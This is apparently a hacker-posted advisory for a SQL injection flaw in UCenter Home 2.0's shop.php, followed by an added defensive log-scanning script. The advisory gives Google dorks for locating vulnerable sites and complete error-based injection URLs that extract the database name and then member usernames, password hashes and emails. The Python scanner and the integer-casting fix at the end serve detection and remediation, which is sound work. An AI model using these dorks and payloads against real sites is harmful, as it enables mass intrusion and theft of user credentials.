__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim's database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

DB : Okay.
Edit your DB : `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okay.

Use hex conversion, and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
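
As a defensive counterpart to the request pattern above, this added example (not part of the original advisory) scans web access log lines for shop.php requests whose shopid is not a plain integer and flags those carrying the error-based query shape. The log lines, function names and the three-marker threshold are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Client address and request target from a combined-format access log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Building blocks of the MySQL error-based query shape sent in shopid.
MARKERS = [re.compile(p, re.I) for p in (
    r"floor\s*\(\s*rand\s*\(", r"information_schema", r"group\s+by",
    r"concat\s*\(", r"\bselect\b")]

def normalise(value, rounds=3):
    """Undo nested URL encoding so keywords are matched in clear text."""
    for _ in range(rounds):
        value = unquote_plus(value)
    return value.strip()

def classify_shopid(raw):
    """Return 'ok', 'non-numeric' or 'error-based-sqli' for one shopid value."""
    value = normalise(raw)
    if value.isascii() and value.isdigit():
        return "ok"
    hits = sum(1 for marker in MARKERS if marker.search(value))
    # Assumed threshold: three or more markers means the error-based shape.
    return "error-based-sqli" if hits >= 3 else "non-numeric"

def scan(lines):
    """Return (line_number, client, verdict) for suspicious shop.php requests."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        client, target = match.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/shop.php"):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get("shopid", []):
            verdict = classify_shopid(raw)
            if verdict != "ok":
                findings.append((number, client, verdict))
    return findings

# Constructed sample lines (documentation addresses), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 412',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /shop.php?ac=view&shopid=253%27 HTTP/1.1" 200 388',
    '192.0.2.10 - - [01/Jan/2024:10:02:00 +0000] "GET /space.php?uid=1 HTTP/1.1" 200 2048',
]
```

Because shopid is a numeric identifier, any value that fails the integer check is worth reviewing; the same check applied server-side (casting shopid to an integer before it reaches the query) removes the injection point.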